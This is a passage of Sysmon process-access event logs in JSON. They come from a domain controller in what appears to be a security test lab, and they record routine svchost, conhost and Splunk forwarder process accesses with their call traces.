0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.704","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3387,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.704\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.704","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3388,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.704\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.704","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3389,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.704\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.704","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3390,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.704\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.704","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3391,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.704\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.704","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3392,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.704\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.704","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3393,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.704\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF4-5F25-0000-00108E6C0500}\r\nTargetProcessId: 2616\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.704","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF4-5F25-0000-00108E6C0500}","TargetProcessId":"2616","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3394,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.923\r\nSourceProcessGUID: {41C8662E-1FF4-5F25-0000-00108E6C0500}\r\nSourceProcessId: 2616\r\nSourceThreadId: 2756\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.923","SourceProcessGUID":"{41C8662E-1FF4-5F25-0000-00108E6C0500}","SourceProcessId":"2616","SourceThreadId":"2756","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program 